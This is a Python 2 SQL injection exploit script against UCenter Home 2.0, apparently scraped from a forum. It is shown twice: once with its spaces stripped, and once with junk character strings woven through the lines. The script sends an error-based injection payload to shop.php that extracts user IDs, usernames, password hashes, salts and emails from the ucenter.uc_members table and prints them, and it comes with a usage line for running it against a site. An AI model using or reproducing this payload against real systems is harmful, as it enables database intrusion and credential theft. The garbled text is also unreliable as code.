#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
+ h8 P+ R4 e: Z2 m# W8 Z
' p6 q1 T1 ?7 ^- E7 K; k9 Q5 J
4 L# C% z4 @2 F: l. b6 O* \$ ?#!/usr/bin/env python 1 k+ _' e4 [* p! a+ \
) w4 [2 x6 p* H5 s, L5 ` x0 {& h1 zimport sys + k' E# \3 C7 `9 {4 w5 |
import urllib2
3 R5 e. k# c( m1 ^, Dimport re 4 K, C7 }6 W" W+ @& n' O7 z
b6 N' J. A; A5 u3 d. J
def info():
8 D3 r6 u, D3 S9 m- e* n print 'From:http://www.exploit-db.com/exploits/14997/'
d6 A- m( [% W, A# l% R3 k, I4 } print 'http://www.hake.cc/Web_loudong/' ) B; {# ?6 b0 ~4 Z/ y
print 'changed:qiaoy' 1 i5 G- D, p* E
print 'exp:'
" p- H+ y; F7 R, T4 V print ' ./UCenter_Home_2.0.py site'
4 Y; w) b/ L7 Y
: M! I6 l" Y9 bdef main(): & u& e' Z5 |: y7 G1 U% x8 F
if len(sys.argv) != 2:
* C9 R* r6 U* P. f) W" A info()
$ c- x# i+ N: Z% A0 U else:
6 z9 |8 ^' h/ x3 y5 g0 N6 z% i site = sys.argv[1] * ]+ q' C9 @/ }7 A% C" V) `! ~8 b
if site[0:7] == 'http://':
/ q2 I6 b- N/ h2 M0 j sitesite =site 4 K) z3 v& [' [& g/ z, C( {
elif site[0:8] == 'https://': 8 D, j; C, C2 }1 W8 d: Y
sitesite = site - E& s' A) @2 T7 c! y+ e0 V
else: 5 f' f- G% ?0 K; T0 R6 i- c2 m5 j- ^
site = 'http://'+site 6 `) d* B) L+ ^9 O/ ]
try: C2 A6 b$ P3 @+ F7 Q+ T
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
/ T+ ?. `% n h Value = urllib2.urlopen(url).read()
2 {' [2 r" Y' g+ ` Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
! i9 q% q% c+ ]! Z2 I) M4 b2 ?* p hacked = Msg.split(':')
# r% g ~# x) d8 G0 w% C" h print 'Name: '+hacked[1]
. b3 |4 S, h- c$ Q. a+ V: w5 P print 'Passwd: '+hacked[2]
. @/ } o; j2 K* h8 L$ R n print 'salt: '+hacked[3]
5 s4 U1 ^/ A, C T# ?% _& ` print 'email: '+hacked[4]
. b5 p9 I$ Y" R. |6 H$ S9 w, ] except:
/ r( U- X- E: E% e2 v9 ]& w. C% Q* t print 'Sorry,I can\'t work............'
& w( `; G! e* C( h4 f9 d " p$ \8 P$ U' z+ U% R9 O
if __name__ == '__main__': % c( A, _4 V, F' a
main() |